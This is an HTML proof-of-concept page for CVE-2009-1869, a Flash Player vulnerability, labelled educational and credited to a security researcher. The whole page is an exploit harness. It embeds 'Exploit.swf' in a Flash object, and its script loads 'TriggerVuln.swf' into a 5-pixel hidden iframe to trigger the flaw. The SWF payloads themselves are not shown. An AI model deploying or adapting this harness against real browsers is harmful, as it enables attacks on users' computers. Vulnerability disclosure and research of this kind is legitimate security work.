<!--
 PoC for CVE-2009-1869, for educational purposes only
 Created by Roee Hay - roeehay@gmail.com
-->

<HTML>
<HEAD>
<SCRIPT>


function crash()
{
	document.crash.location.href="TriggerVuln.swf";
}

</SCRIPT>
</HEAD>
<BODY>
	<object name="flash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="550" height="400" id="heap" align="middle">
	<param name="allowScriptAccess" value="sameDomain" />
	<param name="allowFullScreen" value="false" />
	<param name="movie" value="Exploit.swf" /><param name="quality" value="high" /><param name="bgcolor" value="#ffffff" />
	</object>

<IFRAME width=5 height=5 name="crash"></IFRAME>
</BODY>
</HTML>